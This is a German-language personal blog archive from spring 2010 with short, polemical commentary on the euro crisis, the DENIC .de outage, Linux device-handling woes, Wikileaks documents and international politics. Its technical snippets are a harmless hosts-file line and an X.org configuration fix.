Wenn wir also mit China konkurrieren wollen, müssen wir auch den Euro mehr oder weniger an den Yuan und damit den Dollar binden. Und genau das haben wir gerade getan.
Mit Spekulanten hat das nichts zu tun. Gar nichts. Und es ist eine Schande, dass die uns diesen Blödsinn auftischen und so viele Leute das auch noch glauben.
Update: Hier geht der Ex-Bundesbank-Chef Otto Pöhl sogar noch weiter und bezeichnet die Spekulanten als Erfindung:
SPIEGEL: Kann es sein, dass die Politik den angeblichen Angriff der Spekulanten nur erfunden hat, um eine Legitimation für den Bruch des Lissabon-Vertrags und die EZB-Satzung zu haben?
Pöhl: Natürlich, das ist möglich. Es ist sogar plausibel.

Tue May 18 2010

[l] Ungewöhnliche Sicherheitsmaßnahmen für 200: Nach Bombendrohungen begleiten kanadische Kampfjets ein Passagierflugzeug bis zum Flughafen. Was die da wohl getan hätten, wenn da tatsächlich eine Bombe gewesen wäre und hochgegangen wäre? Schöne Fotos gemacht? Die Maschine kam aus Hong Kong in Richtung Vancouver, und die Bombendrohung kam drei Stunden vor dem geplanten Landezeitpunkt rein. So viele Optionen zur Umlenkungen hatten die da nicht, Anchorage vielleicht noch. Ich hätte ja gedacht, dass man dann eher der Marine Bescheid sagt. (Danke, Tilman)
[l] Hier ist einer für meinen Freund Holgi: Selbstmordversuch durch Überdosis scheitert, weil sie ein homöopathisches "Medikament" benutzt hat für die Überdosis. Man soll ja keine Witze über Selbstmordversuche machen, aber … meine Güte!
Update: Hahaha, mir mailt gerade jemand folgenden guten Ratschlag:
Die gute Frau hat das falsch gemacht.
Die Wirkung wird ja Potenziert wenn man weniger Wirkstoff nimmt.
Am einfachsten hätte sie also Selbstmord begehen können,
wenn sie dieses Mittel erst garnicht genommen hätte :)
Messerscharf argumentiert!
[l] Bezüglich des Opium-Pilzes hat mir jemand noch diese Geschichte von 1998 gemailt:
Eine Mikrobe aus dem Biowaffen-Arsenal der Sowjetunion soll jetzt Mohnfelder vernichten
Gut, das ist 12 Jahre her, insofern vielleicht nicht unbedingt ein Kausalzusammenhang. Trotzdem ein interessanter Zusammenhang.

Mon May 17 2010

[l] Israel hat Noam Chomsky nicht einreisen lassen. Und was für ein Lacher das ist, wie die Presse da von Pontius zu Pilatus geschickt wurde, auf der Suche nach dem Verantwortlichen. Eingeladen hatte ihn ein Palästinenser, das hat warhscheinlich die Lage nicht besser gemacht. Der sagt, das hier war die Begründung:
According to Barghouti, security sources at Allenby Bridge told Chomsky that he would not be allowed to enter Israel following an order issued by senior Israeli Interior Ministry officials due to his political opinions.

Sat May 15 2010

[l] Liedtipp: "Der Typ, der bei der GEMA die Titel eintippt, ist ein ganz blöder Penner". Und sie haben sich bemüht, das Lied länger als 4 Minuten werden zu lassen. Denn dann ist das Lied ein Langstück, und die GEMA muss es fettdrucken. (Danke, Jochen)

Thu May 13 2010

[l] Auch die englische Wikipedia wird von humorfreien Unsympathen betrieben: xkcd hat einen Wikipedia-Strip gemacht, und daraufhin ist das Wort weg (war es vorher da?) und es entspannt sich eine epische Löschdiskussion. Und das bei den Amis, die eine umfangreiche Seite für Kryptonit haben (hat die deutsche Wikipedia übrigens auch, enzyklopädische Relevanz, my ass)

Wed May 12 2010

[l] Die DE-Domain hat gerade Stress. Entweder hat da jemand ein Stoppschild einbauen wollen, oder (mein privater Favorit) es hat was mit DNSSEC zu tun, oder es war schlicht ein ganz normaler Verkacker. In jedem Fall, ich habe folgendes in meinem /etc/hosts stehen:
```
80.244.246.150 ptrace.fefe.de blog.fefe.de
```
Da müssen sie dann schon das Routing verkacken, nicht nur DNS, damit es nicht mehr geht. Seufz.
Update: Eines ist jedenfalls klar: es war nicht Lutz Donnerhacke. Wenn der es gewesen wäre, wären alle Server kaputt, nicht nur die Hälfte. Keine halben Sachen! :-)
Update: Gerade bei www.denic.de vorbeigeguckt, mit elinks, und kriege:
Database Error
The current username, password or host was not accepted when the connection to the database was attempted to be established!
Wer hat diese Leute nochmal für unsere Landesdomain zuständig gemacht? m(
Update: Mir reicht gerade jemand rein, dass die in-offizielle Begründung für den Fuckup bekannt ist. Ich zitiere mal:
die DENIC hat die DE-Zone versehentlich signiert und alle nicht-DNSSEC-faehigen Resolver haben nun Probleme.
Mwahahahaha, "versehentlich signiert", ich lach mich kaputt. Ich bin ja nun kein dnssec-Evangelist, aber an sich sollten die anderen Resolver dann halt die zusätzlichen Records ignorieren. Kurz gesagt: I call bullshit. Andererseits ist das DENIC gestern von Amsterdam nach Frankfurt umgezogen. Vielleicht haben sie dabei was verkackt?
Update: Jetzt liegt doch eine offizielle Erklärung des DENIC vor.
Update: Anscheinend ist einfach nur ein Zonentransfer abgebrochen. Und DNSSEC war nicht Schuld. Im Gegenteil lief das DNSSEC-Testbett weiter, weil eine kaputte halbe Zone nicht angenommen wird, weil die Signatur kaputt ist. Also haben wohl vereinzelte Experten ihren Kunden die IPs vom DNSSEC-Testbett gegeben, wodurch die einen schönen Lasttest fahren konnten *hust*

Sat May 8 2010

[l] Soll noch mal jemand sagen, an der Börse würden keine Billiardäre gemacht! Einige Comdirect-Kunden waren z.B. über Nacht Billiardäre.
"Auf meinem Depot wurden auch nach mehrmaligem Anmelden sehr große Werte der Depotsumme angezeigt", berichtet ein c't-Leser, der über Nacht auf wundersame Weise um über 92 Billiarden Euro reicher geworden war.
Mhh, 92 Billiarden, ja? Hmm. Kommt die Nummer jemandem bekannt vor? Ich zeige euch mal meine Theorie: die maximale Zahl, die man in einem 64-bit Integer abbilden kann, ist 9.223.372.036.854.775.807. Wenn man den Kontostand in Cent als 64-bit Integer ablegt, ist also der höchstmögliche Kontostand 92.233.720.368.547.758,07. Na so ein Zufall! Meine Theorie ist, dass da eine Routine einen Fehler gemeldet hat, indem sie -1 statt der Zahl zurückgeliefert hat.
[l] Erinnert ihr euch daran, wie sie gesagt haben, man könne doch auf den Nacktscannern gar nichts peinliches erkennen, und die Genitalien blieben privat? Nun, In Miami wurde gerade ein Flughafen-Security-Typ verhaftet, weil er einen Kollegen zusammengeschlagen hat. Der Kollege hatte nämlich auf dem Nacktscanner gesehen, wie klein der Schniedel des Schlägers war, und hat dann darüber Witze gemacht. Soviel also zu unserer Privatsphäre im Zeitalter der Nacktscanner.

Thu May 6 2010

[l] Verschwörungstheorie des Monats: Nordkorea hat die Bohrinsel versenkt. Und wie es sich für eine ordentliche Verschwörungstheorie gehört, haben sie lauter bizarre Details da drin. Grandios!
Update: Mir haben Leute gemailt, dass die Site, auf die das verlinkt hat, Malware verbreitet. Daher habe ich den Link rausgenommen. Keine Ahnung, ob da was dran ist, mich betrifft sowas im Allgemeinen nicht :) Habt ihr etwa alte Browserversionen im Einsatz?! Anscheinend stellt die Malware im Browser einen Proxy ein, das könnt ihr ja mal gucken, wenn ihr nicht sicher seid, ob ihr betroffen seid.
[l] Toller Vorschlag der Russen, wie die Amis mit dem Ölproblem umgehen sollen: Einfach eine Atombombe drauf tun, so haben wir das auch immer gemacht!1!!
Nun ist das Pravda, gegen die ist die "Bild" ernstzunehmender Journalismus, insofern wertet das mal nur als Popcornente am Rande.

Wed May 5 2010

[l] Der Reifenhersteller Schwalbe soll ein paar seiner Händler abgemahnt haben, weil sie Produktfotos von ihnen verwendet haben. Nun sollte man denken, der Hersteller freue sich, wenn Händler bemüht sind, seine Produkte zu verkaufen. Hersteller machen in anderen Fällen Produktfotos gerade deswegen, damit Händler die verwenden und ihre Produkte auf den Händler-Webseiten vorteilhaft aussehen und nicht wie mit der Aldi-Digicam im dunklen Keller geknipst. Vielleicht haben die mal nachgerechnet und halten das Abmahngeschäft für profitabler als das Reifengeschäft? Denn wenn ich ein Händler wäre, und mich mahnt ein Zulieferer ab, dann kann sich der Zulieferer andere Händler suchen.
Update: Schwalbe entschuldigt sich. (Danke, Thomas)

Sat May 1 2010

[l] Habt ihr von dem Arizona-Rassismus-Problem gehört? Die haben ein Gesetz gemacht, dass die Polizei jeden nach seinen Papieren fragen muss, den sie für einen illegalen Einwanderer halten. Nun muss man dazu wissen, dass die Nicht-Einwanderer-Bürger der USA keine Verpflichtung haben, sich auf Zuruf ausweisen zu können. Einen Ausweis gibt es schonmal gar nicht, man benutzt hier dafür den Führerschein. Das ist also grotesk, von den Latinos plötzlich zu fordern, dass sie sich ausweisen können.
In der Debatte innerhalb der USA gerade ist der Tenor, dass das Gesetz eine Schande ist, dass das das letzte Aufbäumen des widerlichen Rassismus der Republikaner-KKK-Nazifraktion ist, und dass das beim ersten Anhusten vor Gericht platzen wird, das Gesetz. Fragt sich nur, warum die das dann machen.
Dafür hat Greg Palast eine tolle Verschwörungstheorie. Er glaubt, der Hintergrund ist, dass sie Angst haben, von der wachsenden Latino-Bevölkerung bei den Wahlen hochkantig rausgeschmissen zu werden, denn von den unterdrückten Einwanderern wählt keine Sau Republikaner, und die stellen in Arizona im Moment die Gouverneurin. Die müssten erstmal nur lange genug aushalten mit dem Gesetz, bis die Wahlen um sind. Die Details sind, wie immer bei Greg Palast, zum kotzen. Die haben schon bei der letzten Wahl beschissen, dass sich die Balken nur so biegen, und lauter angeblich illegale Wähler vom Wählen abgehalten. Nun ist es strafbar (mit Gefängnis!), wenn man als nicht Wahlberechtigter zu wählen versucht. Aber sie haben keinen einzigen der angeblichen Täter damals angezeigt nach der Wahl. Denn darum ging es ja nicht. Sie wollten nur die Wahl fälschen. Nicht mal das ist gelungen damals. Die ist jetzt nur die Gouverneurin, weil Obama die demokratische Gouverneurin in sein Kabinett berufen hat, und jetzt ist die Republikanierin nachgerutscht. Bizarres System, was die da haben.

Fri Apr 30 2010

[l] Die USA haben Abbas zugesichert, kein Veto gegen eine Anti-Israel-UNO-Resolution einzulegen, wenn Israel weiter Siedlungen baut. Ich glaube ja, die haben Abbas mal direkt ins Gesicht gelogen. Aber es würde mich freuen, wenn sie zu ihrem Wort stehen. Es ist gut, dass Abbas das öffentlich gemacht hat.
The assurances were given verbally in a meeting a week ago between a senior US diplomat and the Palestinian president, Mahmoud Abbas.
Aha, mündlich. *augenroll*

Tue Apr 27 2010

[l] Lesenswerter Bericht über einen spanischen Richter mit Rückgrat.
Im Juli 1988, fünf Monate, nachdem Garzón seinen Dienst beim Nationalen Gerichtshof angetreten hatte, ließ er zwei Polizisten festnehmen, die er verdächtigte, an einem Mord der "Antiterroristischen Befreiungsgruppen" (GAL) beteiligt gewesen zu sein. Die GAL ermordeten Mitte der 1980er-Jahre 25 echte und vermeintliche ETA-Mitglieder. In späteren Ermittlungen kam Garzón zu der Überzeugung, dass hinter den Attentaten das Innenministerium der sozialistischen Regierung von Felipe González steckte; ein früherer Innenminister und sein Staatssekretär wurden deswegen zu je zehn Jahren Haft verurteilt.
Welch seltenes Geschenk für ein Land, so jemanden als Richter zu haben. Er war es auch, der einen Haftbefehl gegen Pinochet erlassen hat. Und er hat auch ein Verfahren gegen Guantanamo eingeleitet. Ein veritabler Held, dieser Mann. Völlig klar, so jemanden können Politiker nicht im Amt lassen. Jemand, der Verbrechen tatsächlich verfolgt, ist für Politiker und andere Berufskriminelle eine existenzielle Bedrohung. Jetzt läuft ein Amtsenthebungsverfahren gegen ihn, weil er sich kurzzeitig angemaßt hatte, für die Aufklärung der Greueltaten der Franco-Diktatur zuständig sein zu wollen.
Völlig überraschend - für Freunde und Gegner Garzóns - nahm der Oberste Gerichtshof, gegen das Votum der Staatsanwaltschaft, den Strafantrag an. Garzón habe sich mit "kreativer Vorstellungskraft" über das Amnestiegesetz von 1977 hinweggesetzt und damit gezeigt, dass er "wesentliche Prinzipien des Rechtsstaates" nicht kenne, schreibt der zuständige Richter Luciano Varela in seinem Beschluss vom 7. April dieses Jahres, der die offizielle Anklageerhebung gegen Garzón vorbereitet.
Krasse Scheiße. Ich wußte gar nicht, dass das eine Option ist! Gilt das EU-weit? Da fielen mir auch in Deutschland spontan ein paar Gerichte ein, bei denen man mal prüfen könnte, ob die die Grundlagen unseres Rechtsstaates verstanden haben.

Fri Apr 23 2010

[l] Goldman Sachs will angeblich Karstadt kaufen. Und die Heuschrecke Blackstone ist wohl auch gerade an Kaufhäusern interessiert. Ob die so viel Profit gemacht haben, dass sie dringend noch schnell was abschreiben müssen?

Tue Apr 20 2010

[l] Ich kann euch gar nicht sagen, wie sehr mir diese ganzen nicht funktionierenden Automatismen auf den Sack gehen, die diese Linux- und Freedesktop-Marodeure da immer aushecken. Früher hatten wir ein /dev, das hat einfach funktioniert, aber das reichte nicht.
Dann brauchten wir ein devfs. Da hießen dann plötzlich alle Devices anders. Klar, liegt ja auch nahe. Also haben wir alle Software anfassen müssen, die mit Devices operiert.
Dann reichte das plötzlich nicht mehr, und wir brauchten udev. Da hießen dann plötzlich wieder alle Devices anders. Klar, liegt ja auch nahe. Also haben wir wieder alle Software anfassen müssen, die mit Devices operiert.
Das reichte dann plötzlich auch nicht mehr. Wir brauchten ein Layer darüber, "hald", von den Freedesktop-Spacken. Das habe ich noch nie irgendwo funktionieren sehen, es ist die Krätze auf Erden, ein unfassbarer Haufen Scheiße, das geht gar nicht. Der Antichrist persönlich würde sich in Grausen abwenden, wenn es ihn gäbe. Es ist so furchtbar, dass selbst seine Erfinder sich jetzt davon abwenden. Das neue X 1.8 zieht jetzt seine Device-Informationen nicht mehr aus hald, sondern aus udev. Das führt bei mir dazu, dass er weder Maus noch Keyboard findet. Warum auch. Braucht man ja auch nicht. Natürlich beendet sich X nicht, wenn er keine Devices findet, sondern er bleibt hängen, so dass man die Kiste resetten muss, um es wieder zu beenden. TOLLES ENGINEERING, ihr Spacken!
Nach nur wenigen Stunden meiner Lebenszeit, die ich in diesen undebugbaren Haufen Mist stecken mußte, habe ich folgende Lösung gefunden:
```
Section "ServerFlags"
        Option "AutoAddDevice" "false"
        Option "AllowEmptyInput" "false"
EndSection
```
Ich neige ja an sich nicht zu Gewaltphantasien, aber diese Leute haben Ferien in Abu Ghraib verdient.
Oh und von dbus fange ich gar nicht an, das setzt dem nochmal eine Krone auf. Wieso erfinden die Leute alle Automatismen, die dann nicht automatisch funktionieren, sondern umfängliche Konfigurationsarbeiten benötigen?! Ich erinnere mich mit Grausen daran, diese furchtbare Bluetooth-Grütze debuggen zu müssen, die plötzlich dbus wollte. KOTZ!
Ich will an der Stelle mal einen Freund zitieren:
die freedesktop-leute spenden ja sonst ihre gesamte zeit damit, linux und x11 zu einem single-user-system zu machen. jetzt sind sie wohl noch einen schritt weiter beim zero-user-system
Das hat mich über die Jahre so viel Zeit gekostet und soviel Ärger gemacht, dass es auf dem besten Weg ist, den Ärger aufzuwiegen, den ich in der Zeit mit bei Windows bleiben gehabt hätte. Es ist eine Schande, dass wir es so weit kommen lassen. Ich bin ja fast gewillt, das langsam als Zersetzungsstrategie aufzufassen, zumal da ja auch die ganzen Distro-Versager mitpfuschen, die offensichtlich alle das Geheimwissen als Firmengeheimnis behalten wollen, das man braucht, um ihren Automatismus-Müll zum Funktionieren zu bewegen.

Sat Apr 17 2010

[l] Demnächst kommt ein spannend klingender Film ins Kino (zumindest in England): Erasing David, über einen Briten, der unterzutauchen versucht. Der hat ein paar Detektive auf sich selbst angesetzt und ist dann geflohen. In dem Film geht es darum, was die Detektive alles gemacht haben, um ihn zu finden. Ich finde vor allem das Detail witzig, dass der dann nach Deutschland geflohen ist. Da haben wir offensichtlich doch was erreicht mit unserem Datenschutz-Gekämpfe hier. Zumindest vom Image als Datenschutzland her. (Danke, Andreas)

Fri Apr 16 2010

[l] Grrr, Chrome pasted plötzlich URLs ohne http:// am Anfang. Das hat mir ein paar Links im Blog kaputt gemacht. *GRUMMEL*

Tue Apr 13 2010

[l] Ihr habt ja sicher auch die Consulting-Geschichte durchgelesen. Dazu muss ich euch mal eine spannende Sache zeigen. Ich habe mit ein paar Freunden debattiert, wenn das ja so offensichtlich die Wahrheit ist, wieso so viele Leute Consultants für solche Firmen sind. Ob die nicht wissen, was sie da tun. Ja, wissen sie natürlich, aber sie ignorieren es. Die menschliche Kapazität zum Selbstbelügen ist phänomenal und wird häufig unterschätzt. Stichwort mal wieder kognitive Dissonanz. Niemand nimmt sich für sein Leben vor, Menschen ins Elend zu stürzen. Daher setzt, wenn man entdeckt hat, dass man schlechte Dinge macht, ein Verteidigungsmechanismus ein. Das Hirn operiert dann so: mhh, das ist schlecht, aber ich habe es gemacht, also kann es doch nicht so schlecht sein.
Und wie weit dann die Selbstverarschung gehen kann, das illustriert dieses Video hervorragend. Es handelt sich um einen angesehenen japanischen Meister der Kampfkunst. Der betreibt eine Schule mit 100-200 Schülern. Er glaubt an Kraftübertragung per Chi. Gruppendynamik sorgt dafür, dass ein neuer Schüler, der die anderen Schüler unter den unsichtbaren Schlägen des Meisters zusammenbrechen sieht, auch glaubt, dass da was dran sein muss. Schließlich hat er ja Mühsal auf sich genommen, um an dem Kurs teilnehmen zu dürfen, das kann also nicht vollständig Betrug sein! Und so kommt es, dass die Schüler alle glauben, das sei echt. Und der Meister, der hat ja de Beweis vor sich, der ist auch davon überzeugt, dass das echt ist.
Dieser Meister hat irgendwann 5000 Dollar ausgesetzt, für denjenigen, der ihn schlagen kann. Und da kam dann eines Tages ein MMA-Kämpfer und hat die Wette angenommen, und der hat den Boden mit dem Meister gewischt. Weil die magischen Chi-Kräfte nicht gewirkt haben bei ihm.
Spannenderweise gibt es das nicht nur bei den Japanern, falls das jetzt jemand für kulturell bedingt hält. Hier z.B. gibt es eine ähnliche "Technik" beim russischen Militär.
Und das müsst ihr euch immer vor Augen halten, damit ihr das bei euch selber erkennen könnt. So funktionieren auch IT-Grossprojekte. Jetzt haben wir schon so viel Geld investiert, das kann doch nicht alles völlig verplempert sein, sonst hätten wir das doch nicht gemacht!1!! Also: mehr Geld hinterherwerfen.
Oh und damit das auch ganz klar ist: die sind nicht doof. Ihr würdet in der selben Situation genau so handeln, und es würde euch völlig rational erscheinen.

Fri Apr 9 2010

[l] Facebook hat anscheinend den Wikileaks-Account zugemacht. WTF?!

Thu Apr 8 2010

[l] Ich weiß nicht, ob ihr das gerade mitkriegt, aber die Russen holen sich gerade Kirgisien wieder. Russland arbeitet ja daran, die ganzen von den Amis und der NATO "befreiten", "unabhängigen" Staaten wieder zurückzuholen, mit mehr oder weniger subtilen Methoden. Es fing damit an, dass der Innenminister von wütenden Bürgern verprügelt worden ist. Dann hieß es, die Opposition habe die Regierung gestürzt und der Präsident sei ins Ausland geflohen. Dann hieß es, der Präsident dementiere, er sei noch im Land und im Amt. Jetzt heißt es, der Präsident ist im Süden des Landes und wolle nicht zurücktreten. Im Süden von Kirgisien sind China und Tadschikistan. Tajikistan hat selber einen Bürgerkrieg hinter sich und ist dem Iran näher als Russland.
Und wenn ihr schon am lesen seid, dann lest auch diesen Artikel, der sich erstmal darüber lustig macht, dass keine Sau gerade über Twitter und das Internet redet, wie sie es beim Iran gemacht haben.

Wed Apr 7 2010

[l] Kurze Durchsage aus der Statistikabteilung: Die Häufigkeit von Orgasmen von Ehefrauen hängt doch nicht vom Reichtum des Mannes ab. Das alleine ist ja schon eine schöne Meldung, aber der Lacher kommt ja noch: Ursache der Falschmeldung, dass die Orgasmen vom Reichtum des Mannes abhängen, war die falsche Statistiksoftware. In dem Originalpaper steht wohl, dass die SPSS 15 benutzt haben, eine Kommerzsoftware, und die hat das falsche Modell als Default gehabt, daher kam das falsche Ergebnis raus. Das neue Ergebnis haben sie mit R gemacht, einem Open Source Statistik-Tool. Und sie konnten das auch nur prüfen, weil die Autoren des ersten Papers neben ihren Ergebnissen auch ihre Daten veröffentlicht haben. Wenn das mal kein starkes Argument pro Open Access und Open Source ist, dann weiß ich auch nicht. Oh, und pro Bildung, denn tatsächlich hängt die Orgasmushäufigkeit von Bildung, Gesundheitszustand und Alter der Frauen ab.

Sun Apr 4 2010

[l] Lacher des Tages: Die Amis machen sich Sorgen, dass der Iran den Taliban verdeckt Waffen liefern könnte. Was haben die Amis nochmal in den 80er Jahren mit den Islamisten in Afghanistan gemacht? Oh, ja richtig, verdeckt Waffen geliefert. Welch Ironie also, dass die Amis sich jetzt Sorgen machen, jemand anderes könnte dorthin Waffen liefern.
Vor allem wo der Iran die Amis so nachdrücklich dabei unterstützt hat, die Taliban zu entmachten. Das ist echt eine Schweinerei, ausgerechnet dem Iran jetzt Taliban-Unterstützung unterstellen zu wollen. Wenn hier einer die Taliban bewaffnet, dann die Amis selber, was auch die Afghanen glauben (siehe auch).
Ich würde eher annehmen, dass wenn denen jemand Waffen liefert, dass das dann die Russen sind. Aus historischen Gründen, wissenschon. Aber, mal unter uns: würde mich wundern, wenn da überhaupt jemand Waffen hinliefert. Da gibt es genug Waffen.

Wed Mar 31 2010

[l] Gestern habe ich mich noch über Quicktime als Trojaner-Deployment-Plattform lustig gemacht. Heute stellt sich raus, dass man gar nicht Quicktime braucht. Dafür ist bei uns das Umweltbundesamt zuständig. Aber macht euch keine Sorgen, das ist nur ein ganz harmloser Trojaner!1!! Soll das BSI gesagt haben.
Das BSI dementiert selbstverständlich, jemals so einen Blödsinn gesagt zu haben.
Was für eine Posse.

Tue Mar 30 2010

[l] Israels Oberster Gerichtshof hat Anonymität im Internet zu einem Grundrecht von Verfassungsrang gemacht. Wow! Gerade von Israel hätte ich das jetzt nicht erwartet, weil man ja auch anonym Bombenanschläge ankündigen oder vorbereiten könnte. (Danke, Gerrit)
[l] Der eine oder andere von euch wird es noch nicht mitgekriegt haben: wir haben ein neues Feindbild. Cecilia "Censilia" Malström. Von der kommt aktuell die Durchsage, dass alle unter 18 Jahren Kind sind, wenn es um die Einordnung als Kinderpornographie geht. Die hirnrissigen Aussagen der Frau haben sich so gehäuft, dass es bei einem meiner Werbepartner jetzt sogar schon ein T-Shirt dazu gibt :-)
Also achtet mal auf die Frau, von der droht uns noch viel Ungemach.
Update: Auch der andere Werbepartner hat ein Censilia-Shirt angekündigt. Das flutscht ja, dass es eine Freude ist :-)
Oh und wer das Konterfei für eigene Transparente o.ä. braucht oder sich selber ein Shirt drucken will: PDF A und PDF B, SVG A und SVG B. Die sind public domain, haben sie mir versichert.

Sat Mar 27 2010

[l] Netanjahu hat Obama besucht, um die Wogen zu glätten, und das ist wohl vollständig nach hinten losgegangen. Obama hat Netanjahu demonstrativ sitzen lassen.
After failing to extract a written promise of concessions on settlements, Mr Obama walked out of his meeting with Mr Netanyahu but invited him to stay at the White House, consult with advisers and “let me know if there is anything new”, a US congressman, who spoke to the Prime Minister, said.
Ausgezeichnet. Das hat der Netanjahu schon länger gebraucht. Der Regierung in Israel muss einfach mal deutlich gemacht werden, dass sie mit ihrem Scheiß nicht endlos einfach so durchkommen werden.

Fri Mar 26 2010

[l] Liebe Freunde der leckenden Dokumente, Wikileaks hat mal wieder einen besonders heftigen Hammer für uns. Diesmal können wir uns an einem Memo der "think outside the box" Einheit der CIA delektieren, die debattieren, wie man in Europa dafür sorgen kann, dass die gewaltige Unzufriedenheit der Bevölkerung mit dem Afghanistankrieg nicht dazu führt, dass die Europäer sich aus der ISAF-Mission zurückziehen.
Das Papier zitiert als Haupt-Pro-Faktor für weitere Militärpräsenz die "öffentliche Apathie", die den Regierungen erlaubt, die Wähler zu ignorieren (kein Scheiß, das formulieren die genau so in dem Papier).
Money Quote an der Stelle:
The Afghanistan mission's low public salience has allowed French and German leaders to disregard popular opposition and steadily increase their troop contributions to the [ISAF]. Berlin and Paris currently maintain the third and fourth highest ISAF troop levels, despite the opposition of 80 percent of German and French respondents to increased ISAF deployments
Am wichtigsten sind den Amis an der Stelle Frankreich und Deutschland, aus naheliegenden Gründen. Ihre Hauptsorge ist daher, dass eine lokales Maximum an Toten zum Truppenabzug führen könnte.
Dann analysieren sie Frankreich und Deutschland und schreiben über Deutschland:
German opponents of ISAF worry that a war in Afghanistan is a waste of resources, not a German problem, and objectionable in principle, judging from an INR poll in the fall of 2009.
INR ist dem US-Außenministerium untergeordnet. Die haben hier Umfragen gemacht. Wie kommt man da raus? Ganz einfach: mit PR.
Tailoring Messaging Could Forestall or At Least Contain Backlash
Was könnte man da z.B. erzählen? Auch dafür hat die CIA einen Plan:
Appeals by President Obama and Afghan Women Might Gain Traction
Weil die Franzosen und Deutschen Obama so vertrauenswürdig finden! Und mit Frauen kann man immer punkten bei uns.
The same poll also found that, when respondents were reminded that President Obama himself had asked for increased deployments to Afghanistan, their support for granting this request increased dramatically, from 4 to 15 percent among French respondents and from 7 to 13 percent among Germans. The total percentages may be small but they suggest significant sensitivity to disappointing a president seen as broadly in sync with European concerns.
Nur damit ihr mal seht, wie man heutzutage Meinungen manipuliert. Dieses Dokument muss mehr in den Mainstream. Also los, twittert, bloggt, und sprecht mit euren Bekannten darüber.
Sehr schön auch, wie die CIA die Franzosen einschätzt. Denen muss man einfach ein paar Flüchtlinge vor der Nase rumwedeln, und ihnen ein paar Märchen erzählen, wie die ISAF den Flüchtlingen hilft, und dann ist alles wieder gut.

Thu Mar 25 2010

[l] Lest euch mal die Kommentare hinter dieser Meldung durch. Es geht um den pwn2own-Wettbewerb bei der Cansecwest, wo ein paar Kumpels von Halvar das iPhone mit einem schönen Exploit aufgemacht haben. Aber das eigentlich schöne an der Meldung sind die unsäglich dämlichen Kommentare der debilen Mac-Userbasis. Achtung: soviel Popcorn gibt es nicht, wie man für diese Lektüre braucht!

Tue Mar 23 2010

[l] Und noch eine Schlacht, bei der es nur Gewinner gibt: Der Berliner Verfassungsschutz hatte einen Spitzel im Bundestag, der sich dort u.a. Zugang zu Geheimunterlagen aus dem Verteidigungsausschuss beschafft hat. Warum sollte sowas auch nur in Amerika passieren? Das finde ich gut, wenn sich die ganzen Geheim-Seilschaften gegenseitig bekriegen, dann haben sie nicht genug Hände frei, um uns zu unterjochen. Meine Idealvorstellung an der Stelle wäre, dass das Militär jetzt den Verfassungsschutz plattmacht, und der dann ein paar echt peinliche Dokumente bei Wikileaks hochläd und am Ende beide zugemacht werden. Die Hoffnung stirbt halt immer zuletzt. (Danke, Andy)

Wed Mar 17 2010

[l] Die spannensten Einsichten sind ja immer die, die man eigentlich schon immer irgendwie geahnt hat. Eine meiner Lieblingsthesen ist, dass die ganzen Katastrophen und unklaren Reaktionen auf Notfälle, die wir so gerade haben, eigentlich gar nicht Chaos und Inkompetenz geschuldet sind, sondern im Gegenteil einem Masterplan dienen. In solchen Fällen ist es immer sehr nützlich, sich mal die Sicht von außen anzugucken, in diesem Fall mal wieder Stratfor. Lest euch den Artikel mal ganz durch. Ich fasse mal grob zusammen, was die da sagen. Deren Bestandsaufnahme von Europa ist, dass Deutschland die EU komplett dominiert und die anderen Mitglieder aussaugt und auf deren Kosten Profite scheffelt. Money Quote:
Germany is achieving by stealth what it failed to achieve in the past thousand years of intra-European struggles. In essence, European states are borrowing money (mostly from Germany) in order to purchase imported goods (mostly from Germany) because their own workers cannot compete on price (mostly because of Germany).
Das ist echt wie eine griechische Tragödie, je mehr man darüber nachdenkt.
Aber der Reihe nach. Meine These ist ja schon länger, dass die EU im Grunde ein Schneeballsystem ist, mit dem sich die Zentralstaaten (Deutschland, Frankreich, UK) an den anderen bereichern. Meine Idee war dabei immer, dass wir denen den Euro geben, und billig Geld leihen, und sie uns dann bei sich Infrastruktur bauen lassen. Das bringt denen Schulden und Infrastruktur und uns Wirtschaftswachstum. Aber einen Punkt hatte ich dabei übersehen, den Stratfor jetzt anspricht: die Leitzinsen und Stärke der Währung in der Eurozone. Deutschland ist mit seinen Produkten weit oben in der Wertschöpfungskette und kann daher mit einer starken Währung gut umgehen. Agrarländer wie Griechenland oder Spanien hingegen haben keine Produkte, die es nirgendwo sonst gibt, und müssen daher im Zweifelsfall ihre Währung billig halten, damit sie am Weltmarkt eine Chance haben. In der Eurozone kriegen die jetzt eine Kombination. Erstens müssen sie ihre Grenzen aufmachen und deutsche Produkte ohne Zoll reinlassen, zweitens kriegen sie die Stabilität des Euro und können ihre Währung nicht niedrig halten (das geht über Inflation der Landeswährung, die es ja nicht mehr gibt dank Euro), drittens kriegen sie aber den niedrigen Leitzins der Eurozone, d.h. Banken bewerten das Risiko als gering und geben ihnen praktisch beliebig viel Geld. Die Länder werden also ihre Produkte nicht mehr los (ihr wisst ja, dass Deutschland seine Bauern stark subventioniert, d.h. wir brauchen kein Getreide aus Griechenland), weil sie ihre Währung nicht billiger machen können, aber dafür können sie sich quasi unbegrenzt Geld leihen. Das führt natürlich dazu, dass die sich in eine Schuldenspirale begeben, was sollen sie auch sonst tun. Insofern ist das für Deutschland ein Win-Win, bis Griechenland dann tatsächlich seine Schulden nicht zurückzahlen kann.
Aber nun überlegt euch doch mal, was bisher passiert ist. Wir haben in Griechenland Infrastruktur gebaut, und unser Staat hat das Geld dafür gezahlt. Wir haben das aber so getrickst, dass Griechenland uns das Geld jetzt schuldet. Wir haben schon den Nutzen gewonnen, weil es in unsere Wirtschaft geflossen ist. Der Nutzen wäre auch da gewesen, wenn wir direkt unsere Wirtschaft dafür bezahlt hätten, in Griechenland sinnlose Projekte zu bauen. Wenn Griechenland jetzt ausfällt beim Rückzahlen, dann haben wir den Nutzen schon gehabt, das schadet uns nicht wirklich.
Kurz gesagt: Stratfor hat da glaube ich Recht. Deutschland hat über die EU systematisch die Nachbarn plattgemacht. England hat gedacht, sie kommen aus der Abhängigkeit raus, wenn sie nicht dem Euro beitreten, aber die haben eben auch keine Produkte mehr, die man ihnen groß billig abkaufen könnte. Ich kaufe ja wegen dem billigen Pfund gerne online in England ein, aber was kaufe ich da, Computerspiele, Bücher, Musik, Filme, die sind alle nicht in UK hergestellt. Und so hat England jetzt zwar als Vorteil, dass sie das Pfund abwerten können, und dann werden immerhin ihre Schulden beim Ausland weniger wert. Aber sie gehören halt auch nicht zu den Gewinnern der EU. Frankreich ist da näher an Deutschland dran.
Ich bin sehr gespannt, wie sich das weiterentwickelt, wenn die Länder alle kapieren, in welche Situation sie sich gebracht haben.
